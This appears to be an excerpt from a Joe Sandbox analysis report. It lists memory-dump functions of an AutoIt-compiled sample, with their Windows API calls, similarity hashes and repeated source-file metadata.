                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 2323102230-1173974218
                                                                                                                                                        • Opcode ID: 23be0cd855e04dd5b360089eb2ba59d4882f4f80c0561f44b3b423c1576570ab
                                                                                                                                                        • Instruction ID: 28857fe3dec35e7304a4db3bd4e4e37a9e48d34013b09fbc25f35cec9cbeccdd
                                                                                                                                                        • Opcode Fuzzy Hash: 23be0cd855e04dd5b360089eb2ba59d4882f4f80c0561f44b3b423c1576570ab
                                                                                                                                                        • Instruction Fuzzy Hash: 993123719002186ACF50EFB4E945ADDB7B8AF08340F5045EBE55AE3251EB349B89CB64
                                                                                                                                                        Function 00AD2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                                                        • Opcode ID: d669a9dc0cc1bb37c969d4808ca78d70d658a083cf2cdbd45244fe2ce201f7fd
                                                                                                                                                        • Instruction ID: 651fa8d723c3546a38164eb4a8ed007b811180678c56eda84fa3c1e3cd8b707e
                                                                                                                                                        • Opcode Fuzzy Hash: d669a9dc0cc1bb37c969d4808ca78d70d658a083cf2cdbd45244fe2ce201f7fd
                                                                                                                                                        • Instruction Fuzzy Hash: 0B21077220462176D631A7389D02FF773ECDF69310F544527F58787296EB919A82C392
                                                                                                                                                        Function 00AD17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD180D
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1833
                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AD1836
                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 00AD1857
                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 00AD1860
                                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00AD187A
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AD1888
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                        • Opcode ID: d19c446e7bbc2bb1c21a4f00b39f843306b2bbff26b969bd5d2c6df65eaae447
                                                                                                                                                        • Instruction ID: cf750c8df2ae848ad7cb5abdf7b63f4b45cdd7e943adf91bf6ce5b930c0ff629
                                                                                                                                                        • Opcode Fuzzy Hash: d19c446e7bbc2bb1c21a4f00b39f843306b2bbff26b969bd5d2c6df65eaae447
                                                                                                                                                        • Instruction Fuzzy Hash: 3C211275604204BF9B10DBE8DC89DEE77ECEB09360B408126F915DB361EA74EC419B64
                                                                                                                                                        Function 00AFA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                          • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                          • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AFA13B
                                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AFA148
                                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AFA153
                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AFA162
                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AFA16E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                                        • Opcode ID: 617f53023a2e65fd3408641ee083fcf956edc3341c9ff3a7c24f63ded6f74800
                                                                                                                                                        • Instruction ID: af571a6cdb97a67690d7039ec3dd74cc4f809591bcbbf7086bba590c01674067
                                                                                                                                                        • Opcode Fuzzy Hash: 617f53023a2e65fd3408641ee083fcf956edc3341c9ff3a7c24f63ded6f74800
                                                                                                                                                        • Instruction Fuzzy Hash: C11151B155021DBEEB119FA5CC85EE77F6DEF09798F014215F608A7090CA729C21DBA4
                                                                                                                                                        Function 00AB4C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 00AB4C3E
                                                                                                                                                          • Part of subcall function 00AB86B5: GetLastError.KERNEL32(?,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB86B7
                                                                                                                                                          • Part of subcall function 00AB86B5: __calloc_crt.LIBCMT ref: 00AB86D8
                                                                                                                                                          • Part of subcall function 00AB86B5: GetCurrentThreadId.KERNEL32 ref: 00AB8701
                                                                                                                                                          • Part of subcall function 00AB86B5: SetLastError.KERNEL32(00000000,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB8719
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00AB4C1D), ref: 00AB4C52
                                                                                                                                                        • __freeptd.LIBCMT ref: 00AB4C59
                                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,00AB4C1D), ref: 00AB4C61
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00AB4C1D), ref: 00AB4C91
                                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,?,00AB4C1D), ref: 00AB4C98
                                                                                                                                                        • __freefls@4.LIBCMT ref: 00AB4CB4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1445074172-0
                                                                                                                                                        • Opcode ID: 57889758755a449e9e900c762a16472a234e4e5dc77400876f4ed5c2114f7e7d
                                                                                                                                                        • Instruction ID: 9ad9a2e899d2b5f4160f1599fb1bb9b660d6d0799e19f344217e7c2552c2732f
                                                                                                                                                        • Opcode Fuzzy Hash: 57889758755a449e9e900c762a16472a234e4e5dc77400876f4ed5c2114f7e7d
                                                                                                                                                        • Instruction Fuzzy Hash: BF01DF70401601AFC718BB78EA0A9CD7BEDFF097157108618F9198B253EF39D842CA91
                                                                                                                                                        Function 00AAC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00AAC6C0
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AAC701
                                                                                                                                                        • ScreenToClient.USER32(?,000000FF), ref: 00AAC729
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00AAC856
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AAC86F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                        • Opcode ID: 8e5f12fa2d2d348adcd67b08b1d31f98df3f0e6b4e5cac6b734a2c976879ef82
                                                                                                                                                        • Instruction ID: 24cffc152942ba06710fe18684ee6a66c0c08aa3b0f1b072e4261de4b3d5c75d
                                                                                                                                                        • Opcode Fuzzy Hash: 8e5f12fa2d2d348adcd67b08b1d31f98df3f0e6b4e5cac6b734a2c976879ef82
                                                                                                                                                        • Instruction Fuzzy Hash: 1BB14D7990024ADBEF10CFA8C5807EDBBB1FF09710F149569EC69EB295DB34A940CB64
                                                                                                                                                        Function 00AD9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3253778849-0
                                                                                                                                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                        • Instruction ID: 215c560de5bdc1a4a784d893a71f10655db4ff5e9c993f0caced5101ab085af9
                                                                                                                                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                        • Instruction Fuzzy Hash: 5961BB3061020AAFCF05EF64CE82EFF37A9AF45304F04455AF85A6B292EB34D905CB51
                                                                                                                                                        Function 00AF1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00AF1B09
                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00AF1B17
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AF1B45
                                                                                                                                                          • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AF1B5A
                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00AF1BD0
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00AF1BE2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1380811348-0
                                                                                                                                                        • Opcode ID: 78b7cfb8bffdb86fa2396e15f426c8c875c3ac661dec7d720c1ae7227fc88a21
                                                                                                                                                        • Instruction ID: 4a7dd3fd3337e33719f94296b3440a26eecb156625e86acf62c223c6c570cc29
                                                                                                                                                        • Opcode Fuzzy Hash: 78b7cfb8bffdb86fa2396e15f426c8c875c3ac661dec7d720c1ae7227fc88a21
                                                                                                                                                        • Instruction Fuzzy Hash: 33517D71504304AFD720EF64C985EABB7ECEF89754F00491EF58997291EB70EA05CBA2
                                                                                                                                                        Function 00AF2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2FA0
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2FE0
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AF3003
                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AF302C
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AF306F
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF307C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4046560759-0
                                                                                                                                                        • Opcode ID: ecd267c2217c07a5dd9c89b9f04501a76ebbaa7f476b3e448b5f3ed7c1493c5a
                                                                                                                                                        • Instruction ID: da0f706ab87dce8cea50c38d95943bef1182f50efcc6191a70a1cb352257fa87
                                                                                                                                                        • Opcode Fuzzy Hash: ecd267c2217c07a5dd9c89b9f04501a76ebbaa7f476b3e448b5f3ed7c1493c5a
                                                                                                                                                        • Instruction Fuzzy Hash: CA515A322182049FCB05EFA4C995E6FB7F9BF88314F04491EF646872A1DB71EA15CB52
                                                                                                                                                        Function 00AADB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2037614760-0
                                                                                                                                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                        • Instruction ID: 9d612a68bf617f92cd06da002f3852ed67ed8a1c9ea7b5934279fe912c3ec4b6
                                                                                                                                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                        • Instruction Fuzzy Hash: AF511530A04215AACF21AFA8C5419FDB7B4FF06720F90804AF5C2AB6D2DBB45F42D790
                                                                                                                                                        Function 00AD2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AD2AF6
                                                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00AD2B68
                                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00AD2BC3
                                                                                                                                                        • _memmove.LIBCMT ref: 00AD2BED
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AD2C3A
                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AD2C68
                                                                                                                                                        Memory Dump Source
